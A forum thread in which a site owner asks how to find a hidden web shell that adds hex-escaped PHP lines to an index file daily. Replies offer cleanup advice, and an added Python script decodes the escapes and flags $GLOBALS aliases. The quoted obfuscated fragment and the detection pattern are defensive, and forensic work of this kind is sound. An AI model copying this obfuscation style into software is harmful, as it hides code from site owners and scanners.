I found a bunch of guides on the net... but they don't help. All checks and searches using grep and find show that there is no shell. But all the same, every day there are changes in the index file... lines like these are added:

${"\x47\x4c\x4fB\x41\x4c\x53"}["n\x6b\x67l\x61\x6f\x77c"]="k\x77_\x61\x72\x72";${"\x47\x4cO\x42A\x4cS"}["a\x67\x6eei\x73\x73p\x63\x68\x66"]="\x6b\x77\x73";${"GL\x4f\x42\x41\x4c\x53"}["\x6a\x64\x78\x79\x71q\x6e\x77o"]="A\x72\x74i\x63l\x65\x5fca\x74egory";${"\x47LOB\x41\x4c\x53"}["\x67l\x6cz\x69\x73\x6d\x63\x74\x70\x68"]="c\x6f\x6e\x74e\x6et";${"\x47\x4c\x4fBALS"}["\x65d\x75s\x79e\x77\x6f"]="\x41\x72\x74\x69c\x6ce\x5f\x54\x69\x74l\x65";${"\x47L\x4f\x42A\x4c\x53"}["h\x6a\x68\x78h\x64\x72\x77"]="\x4dat\x65_\x44\x65s\x63\x72i\x70\x74ion";${"GL\x4fB\x41\x4c\x53"}["\x73\x64a\x6dy\x65u\x65"]="M\x61\x74\x65_\x4b\x65\x79\x77\x6fr\x64";${"\x47\x4c\x4f\x42ALS"} 

How do I find this shell? Manul and Aibolit did not help. I contacted my VPS tech support and checked with my paid antivirus, but it also showed that the server is clean (while the index file still contained these lines). I also checked with clamscan. Same result: zero. Maybe there are some other ways that I just could not find?

  • So maybe it's not the server that is infected, but your browser that is adding code to the page? Or not even the browser, but something along the path between the site and the computer, for example a router? - Visman
  • I don't understand. The browser will add PHP lines to a file on the server???? - Hasanagha Aliyev
  • :) My mistake, I was confused by the initial $; my thoughts went in the direction of jQuery. - Visman
  • 2
    How quickly does the malicious code appear after it is removed? If it is fast, check the list of cron jobs; maybe there is something in cron. If there is nothing in cron, then go over what is accessible from the web, initialize git repositories in all your projects, check the file lists for suspicious files, commit the changes and monitor which files change. This will allow you to find foreign code in the future with a single git status command - naym
  • 2
    Given the content of this text: ${"GLOBALS"}["nkglaowc"]="kw_arr";${"GLOBALS"}["agneisspchf"]="kws";${"GLOBALS"}["jdxyqqnwo"]="Article_category";${"GLOBALS"}["gllzismctph"]="content";${"GLOBALS"}["edusyewo"]="Article_Title";${"GLOBALS"}["hjhxhdrw"]="Mate_Description";${"GLOBALS"}["sdamyeue"]="Mate_Keyword";${"GLOBALS"} I would say that it is not a shell or a virus writing this, but some CMS concerned about the security of its sources - Mike

0
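Mike's comment reads the injected line by resolving its \xNN escapes. The same step as an added Python example, not code from the thread: it decodes PHP hex and octal string escapes and lists the $GLOBALS aliases that become visible. The function names, the min_escapes threshold and the SAMPLE constant are assumptions made for illustration.

```python
import re

# PHP double-quoted strings accept \xHH (1-2 hex digits) and \NNN (1-3 octal digits).
# The first alternative consumes an escaped backslash so "\\x41" is left alone.
_ESCAPE = re.compile(r'\\\\|\\x([0-9A-Fa-f]{1,2})|\\([0-7]{1,3})')
_DQ_STRING = re.compile(r'"((?:[^"\\]|\\.)*)"')
# Write through a variable-variable into $GLOBALS, the shape of the injected lines.
_GLOBALS_WRITE = re.compile(r'\$\{"GLOBALS"\}\["([^"]+)"\]\s*=\s*"([^"]*)"')

# Constructed sample: the first two statements of the line quoted in the question.
SAMPLE = (r'${"\x47\x4c\x4fB\x41\x4c\x53"}["n\x6b\x67l\x61\x6f\x77c"]="k\x77_\x61\x72\x72";'
          r'${"\x47\x4cO\x42A\x4cS"}["a\x67\x6eei\x73\x73p\x63\x68\x66"]="\x6b\x77\x73";')

def _unescape(m):
    if m.group(1) is not None:
        code = int(m.group(1), 16)
    elif m.group(2) is not None:
        code = int(m.group(2), 8) & 0xFF   # PHP wraps octal values above 0377
    else:
        return m.group(0)                  # escaped backslash, keep as written
    ch = chr(code)
    # Keep the escape when the character would change how the string reads.
    return ch if ch.isprintable() and ch not in '"\\$' else m.group(0)

def decode_php_escapes(source):
    """Resolve hex/octal escapes inside double-quoted PHP string literals."""
    return _DQ_STRING.sub(lambda s: '"' + _ESCAPE.sub(_unescape, s.group(1)) + '"', source)

def scan(source, min_escapes=4):
    """Report escape density and any $GLOBALS aliases visible after decoding."""
    decoded = decode_php_escapes(source)
    escapes = len(re.findall(r'\\x[0-9A-Fa-f]{2}', source))
    aliases = dict(_GLOBALS_WRITE.findall(decoded))
    return {"suspicious": bool(aliases) or escapes >= min_escapes,
            "escapes": escapes, "aliases": aliases, "decoded": decoded}

if __name__ == "__main__":
    report = scan(SAMPLE)
    print(report["decoded"])
    print(report["aliases"])
```

Applied to the text of each .php file, scan() flags lines that a literal search for GLOBALS misses, since in the sample that name only appears after decoding.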